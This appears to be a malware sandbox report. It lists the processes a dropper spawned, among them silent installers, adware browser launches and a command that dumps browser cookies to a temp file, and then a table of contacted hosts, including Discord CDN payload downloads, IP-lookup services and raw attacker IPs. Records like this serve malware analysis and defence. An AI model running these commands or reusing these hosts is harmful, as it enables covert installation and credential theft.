"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2rw3gt2r.wue\installer.exe /qn CAMPAIGN=654 & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\kw1jrwmk.0bs\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\kw1jrwmk.0bs\gcleaner.exe /mixfive
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rroyph2y.2bo\app.exe /8-2222 & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\2rw3gt2r.wue\installer.exe
C:\Users\Admin\AppData\Local\Temp\2rw3gt2r.wue\installer.exe /qn CAMPAIGN=654
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 7428 -ip 7428
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 272
C:\Users\Admin\AppData\Local\Temp\rroyph2y.2bo\app.exe
C:\Users\Admin\AppData\Local\Temp\rroyph2y.2bo\app.exe /8-2222
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 6044 -ip 6044
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 1944
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3780 -ip 3780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3780 -s 272
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5680 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D728.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1d0,0x210,0x7fff07e9dec0,0x7fff07e9ded0,0x7fff07e9dee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=1840 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1608 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2464 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=2356 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2472 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=3248 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3308 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=1940 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=2480 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=2084 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,4452479499109669087,3428736787785806646,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5924_2045340683" --mojo-platform-channel-handle=1940 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x184,0x188,0x18c,0x180,0x190,0x7ffef07d46f8,0x7ffef07d4708,0x7ffef07d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef07d46f8,0x7ffef07d4708,0x7ffef07d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
Network
| Country | Destination | Domain | Proto |
| N/A | 52.247.37.26:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | settings-win.data.microsoft.com | udp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 20.190.160.71:443 | tcp | |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 20.54.89.106:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 95.101.206.92:80 | go.microsoft.com | tcp |
| N/A | 52.247.37.26:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.166:443 | api.db-ip.com | tcp |
| N/A | 104.26.4.15:443 | api.db-ip.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.160.54:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | a.goatagame.com | udp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.88.226:80 | i.spesgrt.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 52.219.160.54:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.17.130:443 | s.lletlee.com | tcp |
| N/A | 104.21.17.130:443 | s.lletlee.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 172.67.145.110:443 | a.goatagame.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 152.32.151.93:80 | 152.32.151.93 | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 185.186.142.245:22850 | tcp | |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 52.219.64.11:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 52.219.64.11:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 185.206.215.216:80 | tcp | |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 172.67.129.55:443 | money4systems4.xyz | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 37.0.8.88:44263 | tcp | |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 45.87.3.183:2705 | tcp | |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
